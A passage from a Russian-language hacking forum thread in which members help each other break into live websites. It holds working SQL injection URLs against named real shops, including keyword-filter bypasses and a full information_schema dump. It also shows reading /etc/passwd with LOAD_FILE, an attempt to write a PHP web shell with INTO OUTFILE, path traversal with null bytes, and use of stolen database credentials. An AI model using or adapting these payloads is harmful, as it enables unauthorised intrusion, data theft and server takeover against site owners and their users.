Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. stasiliy

    stasiliy New Member

    Joined:
    26 Sep 2009
    Messages:
    27
    Likes Received:
    2
    Reputations:
    1
    Я думаю никак.
    Будет редирект всегда, там фильтры на слова ORDER, UNION,SELECT
     
  2. GroM88

    GroM88 Elder - Старейшина

    Joined:
    24 Oct 2007
    Messages:
    464
    Likes Received:
    62
    Reputations:
    26
    Подобрал колличество полей. Вылезло Forbidden
    можно как то обойти?)
    _http://philshopping.com/product_info.php?id=302+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13--
     
  3. freezed

    freezed Member

    Joined:
    27 Aug 2010
    Messages:
    154
    Likes Received:
    22
    Reputations:
    7
    http://philshopping.com/product_info.php?id=302+and+1=0+union(select+1,2,3,4,5,6,7,8,9,10,11,12,13)+--+
     
    1 person likes this.
  4. stasiliy

    stasiliy New Member

    Joined:
    26 Sep 2009
    Messages:
    27
    Likes Received:
    2
    Reputations:
    1
    Через Php-injection вытащил dbconfig.php
    $dbhost="localhost";
    Пробую подключиться, вместо localhost пишу ip домена.
    К базе подключаеться , а вот mysql_connect_db не работает
    В чем может быть проблемма?
    спасибо
     
  5. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    может mysql_select_db() ?
     
    _________________________
  6. stasiliy

    stasiliy New Member

    Joined:
    26 Sep 2009
    Messages:
    27
    Likes Received:
    2
    Reputations:
    1
    Да, просто ошшибку сделал когда вам писал.

    вот что пишет
     
  7. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    http://google.ru/translate

    нету доступа к этой базе
     
    _________________________
  8. Nek1t

    Nek1t Elder - Старейшина

    Joined:
    7 Mar 2008
    Messages:
    181
    Likes Received:
    16
    Reputations:
    1
    Не получается вывести определенное поле из таблицы MySQL. Причем поле довольно странное.
    1234
    1234
    0

    Пробовал AES_(EN/DE)CRYPT, HEX - на страницу ничего не выводится.
     
  9. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,414
    Likes Received:
    911
    Reputations:
    863
    если пытаешься удоленно подключиться, то часто бывает что отключена функция удаленного в mysql, попробуй поискать phpmyadmin или cpanel, от туда и пытайся зайти...
     
    _________________________
    1 person likes this.
  10. foozzi

    foozzi Member

    Joined:
    13 Apr 2010
    Messages:
    195
    Likes Received:
    13
    Reputations:
    5
    на сайте в поиске ввожу "/XSS/?> оно мне выдает найдено 0 записей по запросу '\"/XSS/?>'
    подставляю еще ' выдает тоже самое только '\'\\\"/XSS/?>' подставляю еще ' выходит '\'\\\'\\\\\\\"/XSS/?>' и после этого когда я подставляю ' выдает результат поиска Оо - первых 20 записей категории

    XSS ?
     
  11. Seravin

    Seravin Active Member

    Joined:
    25 Nov 2009
    Messages:
    475
    Likes Received:
    190
    Reputations:
    221
    ты вообще читаешь что оно тебе написало?
    select id from phpshop_categories where seoname='-3'/**//*!union*//**//*!select*//**/version(),1,2,3,4,5,6--+'' limit 1
     
  12. Seravin

    Seravin Active Member

    Joined:
    25 Nov 2009
    Messages:
    475
    Likes Received:
    190
    Reputations:
    221
    https://forum.antichat.net/thread104591.html
     
  13. foozzi

    foozzi Member

    Joined:
    13 Apr 2010
    Messages:
    195
    Likes Received:
    13
    Reputations:
    5
    есть ли русский фак по nikto 2?
    самому сложновато разобраться прописую например perl nikto.pl -h 91.20*.***.94
    сканирует только директории и файлы.
    Что прописывать например для обнаружения sql или php inj?

    (Ubuntu)
     
  14. Cybersteger

    Cybersteger Member

    Joined:
    9 Oct 2009
    Messages:
    40
    Likes Received:
    13
    Reputations:
    15
    и stasiliy
    можна так

    Code:
    http://www.onlymelbourne.com.au/melbourne.php?id=371+%61nd+1=0+%75nion+%73elect+(%73elect(@x)%66rom(%73elect(@x:=0x00),(%73elect(null)%66rom(%69nformation_schema.%63olumns)%77here
    (%74able_schema!=0x696e666f726d6174696f6e5f736368656d61)%61nd(0x00)%69n
    (@x:=%63oncat(@x,0x3c62723e,table_schema,0x2e,table_name,0x3a,%63olumn_name))))x)
    пс:убрать пробели
     
    3 people like this.
  15. ne0k

    ne0k New Member

    Joined:
    3 Mar 2011
    Messages:
    51
    Likes Received:
    1
    Reputations:
    0
    Доброго времени суток уважаемые,

    Есть вопрос:

    1. Эксплуатирую одну очень важную blind inj.
    Пользователь, из под которого запущена БД привилегированный, т.е. имеет права FILE_PRIV = Y, INSERT_PRIV = Y и тд..
    При использовании конструкции
    Code:
    SELECT LOAD_FILE('/etc/passwd')
    я могу получить список из passwd, и ничего кроме /etc/passwd я прочитать не могу.. Могу ли я читать что нибудь кроме passwd, в той же /etc/ или в любом другом каталоге? Если да, то у меня не выходит.. Читает только /etc/passwd... Может кто нибудь объяснить?

    З.Ы: БД, запросы к которой я посылаю, находится на другом серве, т.е. не на том же сервере что сам сайт.

    1.1. Возможно ли как нибудь узнать, каков IP адрес у этого сервера с MySQL ?

    2. Пытаюсь залить веб шелл, не выходит.
    Code:
    SELECT '<?php phpinfo(); ?>' FROM mysq.user INTO OUTFILE '/rdb-cluster/sites/somesite.com/htdocs/images/info.php'
    
    АХТУНГ, вопрос: Выполняя запрос на заливку шелла, я указываю веб путь на сервере с MySQL или же тот, где используется сценарий? А если MySQL поднят на машине, где вообще нет веб директорий.. То бишь апачи не поднят.. Я так понимаю про шелл через скулю забыть?

    Если же веб путь указывать надо на сервере с апачи, то вот:

    FILE_PRIV = Y

    Full path взятый из phpinfo самого сайта = /rdb-cluster/sites/somesite.com/htdocs/

    По адресу foo.somesite.com/.svn/ я нашел исходники, в которых подключались конфиги с подключением к БД:

    PHP:
    include('/data/vhosts/www.somesite.com/htdocs/inc/conf.php')
    То бишь: /data/vhosts/www.somesite.com/htdocs/

    Из файла entries в той же /.svn/, я выдернул следующую запись:

    /home/user/websites/foo.somesite.com/ .....

    Я немного запутался, и голова идет кругом, подскажите пожалуйста, откуда столько путей? Какой из них "тот самый" ?

    С уважением, надеюсь кто нибудь поможет!
     
  16. plaeer

    plaeer New Member

    Joined:
    8 Mar 2011
    Messages:
    149
    Likes Received:
    3
    Reputations:
    1
    support/button.php?image=asdasd
    Получаю ошибку
    Warning: fopen(locales/ru/button/asdasd_off.gif) [function.fopen]: failed to open stream: No such file or directory in [patch]\support\button.php on line 27
    no image
    Я так понимаю это пхп инекция? Как её заюзать? Сервер на винде.
     
  17. M_script

    M_script Members of Antichat

    Joined:
    4 Nov 2004
    Messages:
    2,581
    Likes Received:
    1,317
    Reputations:
    1,557
    Нет, это не пхп инъекция.
    Можешь использовать для XSS.
    Возможно, получится читать файлы на сервере. Например так:
    support/button.php?image=../../../../../../../[patch]/support/button.php%00
     
  18. M_script

    M_script Members of Antichat

    Joined:
    4 Nov 2004
    Messages:
    2,581
    Likes Received:
    1,317
    Reputations:
    1,557
    ne0k
    1. Какие еще файлы ты пытался читать?
    1.1. Почитать скрипты, которые обращаются к БД
    2. На сервере с MySQL
     
  19. M_script

    M_script Members of Antichat

    Joined:
    4 Nov 2004
    Messages:
    2,581
    Likes Received:
    1,317
    Reputations:
    1,557
    INTO OUTFILE и INTO DUMPFILE обязательно требуют кавычек. В обычных условиях залить ничего не получится. Но исключения бывают, все зависит от конкретного случая.
     
    1 person likes this.
  20. plaeer

    plaeer New Member

    Joined:
    8 Mar 2011
    Messages:
    149
    Likes Received:
    3
    Reputations:
    1
    Спасибо, добрый человек. Но что не работает. Делаю вот так support/button.php?image=../../../../../../../C:/Server/home/localhost/support/button.php%00. Получаю "Wrong parameter used or absent: image" Что не так?
    XSS на этом сайтике чёртова куча, но толк от них, если там даже админки нету.
     
Thread Status:
Not open for further replies.